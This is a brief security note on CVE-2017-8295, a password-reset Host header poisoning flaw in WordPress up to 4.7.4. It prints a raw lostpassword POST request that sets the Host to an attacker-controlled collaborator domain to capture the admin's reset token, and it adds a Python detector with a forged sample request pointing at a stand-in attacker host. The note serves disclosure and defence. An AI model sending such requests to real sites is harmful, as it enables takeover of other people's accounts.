WordPress Account Takeover

CVE-2017-8295 allows an attacker to set the Host header of a password reset request to a domain they control, so that the password reset token is sent where they can obtain it, resulting in account takeover. It affects WordPress <= 4.7.4.

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: <COLLABORATOR.COM>
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password
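
A defender-side check for the request shown above, as an added example that is not part of the original note: it flags lostpassword POSTs whose Host header is not a name the site actually serves. The allowlist, the function names and the sample requests are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: host names this site legitimately serves (constructed values).
ALLOWED_HOSTS = {"blog.example.org", "www.blog.example.org"}


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers dict)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target, headers


def normalize_host(value: str) -> str:
    """Lower-case, drop the port and a trailing dot so comparisons are exact."""
    host = value.strip().lower()
    if host.startswith("["):  # IPv6 literal, e.g. [::1]:8080
        return host.split("]", 1)[0] + "]"
    return host.split(":", 1)[0].rstrip(".")


def is_suspicious_reset(raw: str, allowed=ALLOWED_HOSTS) -> bool:
    """True for a lostpassword POST whose Host header is not one we serve."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    action = parse_qs(url.query).get("action", [""])[0]
    if method != "POST" or not url.path.endswith("/wp-login.php") or action != "lostpassword":
        return False
    hosts = headers.get("host", [])
    # A missing or duplicated Host header is treated as suspicious as well.
    if len(hosts) != 1:
        return True
    return normalize_host(hosts[0]) not in allowed


# Constructed sample requests (not captured traffic).
FORGED = ("POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1\r\n"
          "Host: mail.attacker.example\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          "user_login=admin&redirect_to=&wp-submit=Get+New+Password")
LEGIT = FORGED.replace("mail.attacker.example", "Blog.Example.Org:443")

if __name__ == "__main__":
    print(is_suspicious_reset(FORGED), is_suspicious_reset(LEGIT))
```

The same allowlist comparison can be enforced before the request reaches WordPress, for example in a reverse proxy or a default virtual host that rejects unknown host names.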